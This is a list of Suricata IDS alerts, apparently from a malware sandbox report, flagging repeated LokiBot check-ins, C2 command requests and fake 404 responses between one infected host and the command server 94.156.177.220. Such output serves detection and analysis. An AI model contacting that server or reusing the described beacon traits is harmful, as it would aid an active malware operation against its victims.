Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49867 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49809 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49867 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49861 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49861 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49726
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49889 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49889 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49718
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49784 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49809 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49889 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49861
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49829 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49829 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49784 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49889 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49784 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49889 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49809 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49867
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49792 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49792 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49844 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49778 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49844 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49821
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49850 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49778 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49895 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49924 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49771 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49771 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49771 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49784 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49784 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49771 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49771 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49844
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49778 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49792 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49850 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49850 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49829 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49815 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49815 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49771
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49792 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49838 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49889
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49838 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49924 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49895 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49809
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49924 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49784
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49850 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49924 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49850 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49924 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49838 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49895 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49850
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49829 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49895 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49895 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49931 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49901 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49901 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49873 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49711 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49792
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49838 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49711 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49931 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49901 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49895
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49901 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49815
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49778 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49931 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49912 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49873 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49901 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49873 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49882 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49882 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49882 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49912 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49931 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49882 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49931 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49901
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49873 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49778
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49873 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49953 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49953 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49964 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49964 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49964 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49838 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49940 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49940 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49940 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49749 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49924
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49964 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49964 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49940 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49912 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49953 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49964
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49912 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49912 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49953 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49749 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49882 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49940 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49918 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49918 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49918 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49931
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49918 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49918 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49749 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49873
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50005 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50005 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49912
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49749 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49749 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49918
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49940
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49882
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50027 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50027 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49947 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50019 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50019 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50019 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50029 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49711
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49947 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50040 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50040 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50040 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50041 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50041 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50030 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50041 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50030 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49749
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50005 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49947 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50027 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50030 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50041 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50044 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50041 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50045 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50040 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50045 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50043 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50051 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50043 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50051 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50051 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50030 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50045 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50043 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49998 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50019 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50051 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50051 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50019 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50040 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49838
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50028 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49947 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50044 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50030 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50046 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50029 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50046 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50047 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50047 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50047 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49829
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50019
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50043 -> 94.156.177.220:80
